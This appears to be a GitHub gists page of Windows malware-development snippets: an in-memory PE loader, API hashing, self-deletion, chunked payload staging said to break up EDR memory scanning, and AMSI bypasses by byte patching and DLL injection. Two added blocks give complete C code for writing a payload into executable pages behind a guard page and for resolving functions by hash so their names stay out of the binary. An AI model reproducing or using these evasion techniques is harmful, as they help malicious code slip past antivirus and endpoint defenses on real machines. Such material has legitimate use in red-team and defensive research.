WizardYoga (wizardy0ga): public gists
wizardy0ga / print.c
Created August 23, 2025 19:31
A simple macro for printing to the console from Win32 applications without a C runtime. Can also be used in standard Win32 apps.
// CRT-independent printing macro. The format string must begin with a %s that
// receives __func__, e.g. print("[%s] value = %d", x). wsprintfA writes at most
// 1024 bytes including the terminator, so the 1024-byte heap buffer is exactly
// its limit. With no extra arguments the trailing comma after __func__ is
// swallowed by MSVC's preprocessor (other compilers want ##__VA_ARGS__).
// WriteConsoleA only succeeds on a real console handle; when stdout is
// redirected to a file or pipe, switch to WriteFile.
// The if (1) { ... } wrapper makes the macro usable as a statement but has no
// else branch, so don't use print() as the unbraced body of an if/else.
# define print(msg, ...) \
    if (1) { \
        LPSTR Buf = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024); \
        if (Buf) { \
            int len = wsprintfA(Buf, msg "\n", __func__, __VA_ARGS__); \
            WriteConsoleA(GetStdHandle(STD_OUTPUT_HANDLE), Buf, len, 0, 0); \
            HeapFree(GetProcessHeap(), 0x00, Buf); \
        } \
    }
wizardy0ga / LoadPe.c
Created June 14, 2025 04:11
Load a portable executable in the local process & execute it
/*
@brief
Load a PE in memory and execute it in the address space of this process
@author
wizardy0ga
@usage:
LoadPe.exe <path to exe>
wizardy0ga / Win32Hash.h
Created February 14, 2025 13:57
A header-file library template to support function resolution via API hashing on Windows
#pragma once
#include <windows.h>
#include <stdio.h>
#define SEED_HASH 8888
#define KERNEL32_HASH 0xA52DE12A
#define LOAD_LIBRARY_HASH 0xF4DAB6A4
typedef struct _UNICODE_STRING_
{
wizardy0ga / NtChunkAllocate.C
Created December 3, 2024 00:58
Writing a payload into memory in chunks using the NT API
/*
Description:
Copies a payload into memory in chunks using NTAPI calls. This helps break up the memory-scanning routines of EDRs.
A reserved / read-only page is left at the top of the allocation. Each page below it holds part of the payload.
| Page 1 | 4096 bytes | Reserved | R
| Page 2 | 4096 bytes | Committed | RX
| Page 3 | 4096 bytes | Committed | RX
| Page ... | 4096 bytes | Committed | RX
wizardy0ga / ChunkToMemory.c
Created December 2, 2024 14:03
Copying data into memory in chunks
/*
Description:
Copies a payload into memory in chunks. This helps break up the memory-scanning routines of EDRs.
A reserved / read-only page is left at the top of the allocation. Each page below it holds part of the payload.
| Page 1 | 4096 bytes | Reserved | R
| Page 2 | 4096 bytes | Committed | RX
| Page 3 | 4096 bytes | Committed | RX
| Page ... | 4096 bytes | Committed | RX
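The page layout that both chunking gists describe (guard page on top, payload pages below), as an added example that is not code from either gist: it reserves a no-access guard page, then commits each payload page, fills it with memcpy calls of `chunk` bytes, and drops it to RX before moving to the next page. Win32 calls (VirtualAlloc/VirtualProtect) are used on Windows and mmap/mprotect elsewhere so the example builds on any platform. The chunk size, the page-by-page ordering, the 5000-byte filler buffer and leaving the guard page inaccessible rather than read-only are assumptions of this example, not the gists' method.

```c
#define _DEFAULT_SOURCE
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#include <unistd.h>
#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS MAP_ANON
#endif
#endif

/* Result of one chunked copy: a no-access guard page at base, payload pages below it */
typedef struct {
    uint8_t *base;      /* first page of the reservation: the guard page */
    uint8_t *payload;   /* base + page_size: first payload byte */
    size_t   page_size;
    size_t   pages;     /* total pages, guard included */
} chunked_region;

static size_t os_page_size(void) {
#ifdef _WIN32
    SYSTEM_INFO si; GetSystemInfo(&si); return si.dwPageSize;
#else
    return (size_t)sysconf(_SC_PAGESIZE);
#endif
}

/* Reserve npages with no access; nothing is committed yet */
static uint8_t *reserve_pages(size_t npages, size_t page_size) {
#ifdef _WIN32
    return (uint8_t *)VirtualAlloc(NULL, npages * page_size, MEM_RESERVE, PAGE_NOACCESS);
#else
    void *p = mmap(NULL, npages * page_size, PROT_NONE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    return p == MAP_FAILED ? NULL : (uint8_t *)p;
#endif
}

/* Commit one page read/write so it can receive its share of the payload */
static int commit_rw(uint8_t *page, size_t page_size) {
#ifdef _WIN32
    return VirtualAlloc(page, page_size, MEM_COMMIT, PAGE_READWRITE) != NULL;
#else
    return mprotect(page, page_size, PROT_READ | PROT_WRITE) == 0;
#endif
}

/* Drop a filled page to RX so no writable+executable page is left behind */
static int make_rx(uint8_t *page, size_t page_size) {
#ifdef _WIN32
    DWORD old;
    return VirtualProtect(page, page_size, PAGE_EXECUTE_READ, &old) != 0;
#else
    return mprotect(page, page_size, PROT_READ | PROT_EXEC) == 0;
#endif
}

static void release_region(chunked_region *r) {
#ifdef _WIN32
    VirtualFree(r->base, 0, MEM_RELEASE);
#else
    munmap(r->base, r->pages * r->page_size);
#endif
    memset(r, 0, sizeof *r);
}

/* Copy len bytes of src below a guard page, `chunk` bytes per memcpy, one page at a time.
   want_exec selects the final protection: 1 = RX as in the gists, 0 = leave RW. */
static int chunk_to_memory(const uint8_t *src, size_t len, size_t chunk,
                           int want_exec, chunked_region *out) {
    size_t ps = os_page_size();
    size_t payload_pages = (len + ps - 1) / ps;
    memset(out, 0, sizeof *out);
    if (len == 0 || chunk == 0) return 0;
    out->page_size = ps;
    out->pages = payload_pages + 1;
    out->base = reserve_pages(out->pages, ps);
    if (!out->base) return 0;
    out->payload = out->base + ps;               /* guard page stays reserved, no access */
    for (size_t p = 0; p < payload_pages; p++) {
        uint8_t *page = out->payload + p * ps;
        size_t page_off = p * ps;
        size_t page_len = len - page_off < ps ? len - page_off : ps;
        if (!commit_rw(page, ps)) { release_region(out); return 0; }
        for (size_t off = 0; off < page_len; off += chunk) {   /* chunked writes */
            size_t n = page_len - off < chunk ? page_len - off : chunk;
            memcpy(page + off, src + page_off + off, n);
        }
        if (want_exec && !make_rx(page, ps)) { release_region(out); return 0; }
    }
    return 1;
}

/* Constructed filler standing in for a payload: 5000 bytes, so it spans two 4 KiB pages. Not shellcode. */
static int self_check(int want_exec) {
    uint8_t src[5000];
    for (size_t i = 0; i < sizeof src; i++) src[i] = (uint8_t)(i * 7 + 3);
    chunked_region r;
    if (!chunk_to_memory(src, sizeof src, 256, want_exec, &r)) return 0;
    int ok = r.payload == r.base + r.page_size
          && r.pages == (sizeof src + r.page_size - 1) / r.page_size + 1
          && memcmp(r.payload, src, sizeof src) == 0;
    release_region(&r);
    return ok;
}

int main(void) {
    printf("chunked copy with RX pages: %s\n", self_check(1) ? "ok" : "failed");
    return 0;
}
```

On Windows, NtAllocateVirtualMemory and NtProtectVirtualMemory take the place of the VirtualAlloc/VirtualProtect calls shown; the reservation, the per-page commit and the chunked copy loop are the same. The page size is queried rather than hard-coded to 4096 because mprotect and VirtualProtect reject addresses that are not page-aligned on the running system.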
wizardy0ga / DrmProtection.C
Last active December 25, 2024 04:38
A PoC DRM-protected program for Windows
/*
Description:
Program is a PoC DRM implementation. The program will only execute on the Windows device that it first executed
on. If it's copied to another device, it will delete itself on execution.
A signature is kept in the .rdata section of the binary. On first execution, if the signature is the default signature,
DRM will be initialized. This consists of hashing the BIOS UUID and replacing the default signature with that
hash. When the program executes again, it checks the hash of the BIOS UUID against the signature stored in the
.rdata section. If the hash doesn't match, the program deletes itself.
Note that the SMBIOS UUID is readable by any local process (for example through Win32_ComputerSystemProduct in WMI)
and can be cloned into a VM, so this ties the binary to a host against casual copying, not against a determined adversary.
wizardy0ga / SelfDeleteWin32.c
Last active April 11, 2025 02:03
Force a Windows executable to delete itself by renaming the default data stream & removing the file via the SetFileInformationByHandle API
#include <windows.h>
#include <winternl.h>
#define STREAM_NAME L":XanWudS"
BOOL SelfDelete()
{
HANDLE hFile = INVALID_HANDLE_VALUE;
PWSTR szImageName = NULL;
FILE_DISPOSITION_INFO DisposalInfo = { .DeleteFile = TRUE };
wizardy0ga / AmsiBypassDll.c
Last active November 3, 2024 01:10
Demonstration of an AMSI bypass via DLL injection into a PowerShell process
#include "pch.h"
#include <Windows.h>
#include <stdio.h>
#define RET 0xC3   // ret
#define INT3 0xCC  // int3, the single-byte software breakpoint
#define JE 0x74    // short je rel8
#define JNE 0x75   // short jne rel8
#define MOV 0xB8   // mov eax, imm32
wizardy0ga / AmsiBypassViaBytePatch.c
Last active November 22, 2024 20:15
A bypass for AMSI using byte patching
/*
Description:
Bypasses AMSI by patching its functions in memory with single-byte patches. Some AMSI functions
validate their parameters and jump to a failure routine if the validation fails. By flipping this conditional jump,
the functions can be forced to fail, which blinds the Antimalware Scan Interface.
Author:
wizardy0ga
Date:
wizardy0ga / GetProcAddress.c
Last active December 10, 2024 02:17
Custom GetProcAddress function. Avoids listing 'GetProcAddress' in the import address table.
/*
Description:
A simplified version of GetProcAddress. Posting here for reference later.
Author:
WizardY0ga
Mitre:
T1027.007 - Obfuscated Files or Information: Dynamic API Resolution
Date:
October 2024
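Resolution by hash, tying the Win32Hash.h template above to this custom GetProcAddress gist, as an added example that is not the gists' code: a seeded name hash, a case-folded variant for module names, and a resolver that walks the three export-directory arrays (names, name ordinals, functions) the way GetProcAddress does. The hash (seeded djb2 with seed 8888), the constructed export table and its RVAs are assumptions of this example; the constants in Win32Hash.h were produced by the gist's own routine and are not reproduced here, and the example walks arrays supplied in memory rather than parsing a PE image.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <ctype.h>

#define SEED 8888u   /* seed assumed for this example */

/* Seeded djb2 over the export name bytes. Export names are case-sensitive, so no folding. */
static uint32_t hash_export_name(uint32_t seed, const char *s) {
    uint32_t h = seed;
    for (; *s; s++) h = h * 33u + (uint8_t)*s;
    return h;
}

/* Same hash over a module name folded to upper case: the loader's BaseDllName
   case varies ("kernel32.dll" vs "KERNEL32.DLL"), so module hashes must fold. */
static uint32_t hash_module_name(uint32_t seed, const char *s) {
    uint32_t h = seed;
    for (; *s; s++) h = h * 33u + (uint8_t)toupper((unsigned char)*s);
    return h;
}

/* Mirror of the three IMAGE_EXPORT_DIRECTORY arrays a resolver walks */
typedef struct {
    const char *const *names;        /* AddressOfNames: export names, sorted */
    const uint16_t *name_ordinals;   /* AddressOfNameOrdinals: name index -> ordinal */
    const uint32_t *functions;       /* AddressOfFunctions: ordinal -> function RVA */
    uint32_t number_of_names;
} export_view;

/* Hash each name, follow its ordinal to the function RVA. Returns 0 when nothing matches. */
static uint32_t resolve_by_hash(const export_view *ex, uint32_t seed, uint32_t want) {
    for (uint32_t i = 0; i < ex->number_of_names; i++) {
        if (hash_export_name(seed, ex->names[i]) == want)
            return ex->functions[ex->name_ordinals[i]];
    }
    return 0;
}

/* Constructed export table standing in for a real module; ordinals and RVAs are made up */
static const char *const k_names[] = {
    "CloseHandle", "CreateFileA", "GetProcAddress", "LoadLibraryA", "VirtualAlloc"
};
static const uint16_t k_ordinals[]  = { 2, 0, 4, 1, 3 };
static const uint32_t k_functions[] = { 0x1000, 0x2000, 0x3000, 0x4000, 0x5000 };
static const export_view k_exports  = { k_names, k_ordinals, k_functions, 5 };

/* In real use the hash is computed offline and only the number is embedded, so the
   string never appears in the binary; hashing at runtime here keeps the example self-contained. */
static uint32_t lookup(const char *name) {
    return resolve_by_hash(&k_exports, SEED, hash_export_name(SEED, name));
}

int main(void) {
    const char *wanted[] = { "LoadLibraryA", "VirtualAlloc", "LoadLibraryW" };
    for (size_t i = 0; i < 3; i++) {
        /* print the constant you would paste into a header, and what it resolves to */
        printf("%-14s hash 0x%08X -> RVA 0x%X\n", wanted[i],
               (unsigned)hash_export_name(SEED, wanted[i]), (unsigned)lookup(wanted[i]));
    }
    printf("kernel32 module hash folds case: %d\n",
           hash_module_name(SEED, "kernel32.dll") == hash_module_name(SEED, "KERNEL32.DLL"));
    return 0;
}
```

The hash is 32 bits and a module exports at most a few thousand names, so collisions are unlikely but not impossible; hash every export of the target module once offline and confirm the constants you embed are unique within it.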